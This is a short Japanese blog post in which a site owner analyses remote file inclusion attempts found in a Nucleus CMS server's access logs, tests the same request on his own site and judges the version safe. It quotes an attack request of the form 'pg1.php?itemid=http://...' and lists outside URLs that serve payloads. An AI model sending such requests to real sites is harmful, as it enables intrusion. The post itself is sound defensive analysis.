Nucleusにアタックが 1
Nucleus を動かしている webサーバーのアクセスログを見てみたら正常とは言えないアクセスを見つけた。
index.phpとそのほかの2ページに、2週間ほどの間に2900件のおかしなアクセスがあったのだ。
そのアクセスは
GET /pg1.php?itemid=http://school.hostinginfive.com/bike.htm? HTTP/1.1
のような形式のものである。
アクセスを狙っているURLは
http://bikelove.hostinginfive.com/bike.htm?
http://servicepack.sppages.com/index.htm?
http://bikelove.hostinginfive.com/bike.htm?
http://mattd.100webspace.net/bike.htm?
http://babycaleb.fortunecity.co.uk/index.htm?
http://mattd.myhood.se/bike.htm?
http://wiiman.t35.com/index.htm?
など。
少数だが
http://babycaleb.fortunecity.co.uk/index.htm?
http://www.abeleclairage.com/mama.txt???
もある。
マイナーなところでは veloxzone.com.br,vivax.com.brなど ブラジルから
http://sons.moy.su/index.htm?
http://www.pacote270178.xpg.com.br/pacote.txt?
http://super2009.iespana.es/teste.txt?
さらに、dsl.tele.dkから
http://man.43i.net/index.htm?
kabelbw.deからは
http://servicepack.sppages.com/index.htm?
があった。
同様のアタックを自分で行ってみた。
http://stage5.8peaks.jp/index.php?special=http://stage5.8peaks.jp/
Webサーバーには、期待通り
GET /index.php?special=http://stage5.8peaks.jp/ HTTP/1.1
とLogが残った。
そのほか、一通りの組み合わせを試したが、Nucleus( v3.31SP3)では、エラー表示のページが表示されるか、そのグループのトップページがされ、このタイプの攻撃ではセキュリティホールにならないようだ。
さらに Nucleusにアタック 2 に続く
06 Feb, 2009 | mokimoc
Comments
Leave comments
このアイテムは閲覧専用です。コメントの投稿、投票はできません。